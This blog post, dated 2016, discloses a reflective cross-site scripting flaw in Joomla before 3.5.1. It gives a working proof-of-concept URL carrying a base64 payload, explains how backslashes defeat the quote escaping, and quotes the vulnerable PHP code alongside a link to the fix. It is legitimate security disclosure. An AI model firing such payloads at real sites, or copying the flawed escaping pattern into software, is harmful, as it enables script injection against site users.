Monday, 06 June 2016 02:06

Joomla! versions before 3.5.0, including the 2.5.x series (likely all the way back to 1.6.0, no regression testing done) are vulnerable to reflective XSS:

Joomla! 3.5.0 Reflective XSS
============================

http://[joomla site]/index.php?option=com_finder&highlight=WyJcXCIsIl0pO2FsZXJ0KDEpO1wvXC9cXCJd

Decoded payload: ["\\","]);alert(1);\/\/\\"]

How it works: the highlight plugin decodes the payload from base64 then from JSON,
then iterates over the resulting array and attempts to clean each entry before
passing to the "highlighter" behavior.

The highlighter behavior code "escapes" double quotes by replacing them with \",
however it fails to take into account any preceding backslashes. This allows
the payload to break out of the resulting imploded string and execute code.

plugins/system/highlight/highlight.php

                // Get the terms to highlight from the request.
                $terms = $input->request->get('highlight', null, 'base64');
                $terms = $terms ? json_decode(base64_decode($terms)) : null;

                // Check the terms.
                if (empty($terms))
                {
                        return true;
                }

                // Clean the terms array.
                $filter = JFilterInput::getInstance();

                $cleanTerms = array();

                foreach ($terms as $term)
                {
                        $cleanTerms[] = htmlspecialchars($filter->clean($term, 'string'));
                }

                // Activate the highlighter.
                JHtml::_('behavior.highlighter', $cleanTerms);


libraries/cms/html/behavior.php

                $terms = str_replace('"', '\"', $terms);

                $document = JFactory::getDocument();
                $document->addScriptDeclaration("
                        jQuery(function ($) {
                                var start = document.getElementById('" . $start . "');
                                var end = document.getElementById('" . $end . "');
                                if (!start || !end || !Joomla.Highlighter) {
                                        return true;
                                }
                                highlighter = new Joomla.Highlighter({
                                        startElement: start,
                                        endElement: end,
                                        className: '" . $className . "',
                                        onlyWords: false,
                                        tag: '" . $tag . "'
                                }).highlight([\"" . implode('","', $terms) . "\"]);
                                $(start).remove();
                                $(end).remove();
                        });
                ");

a href="https://github.com/joomla/joomla-cms/pull/9524" target="_blank">Fixed in 3.5.1

Last Updated on Monday, 06 June 2016 02:20
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions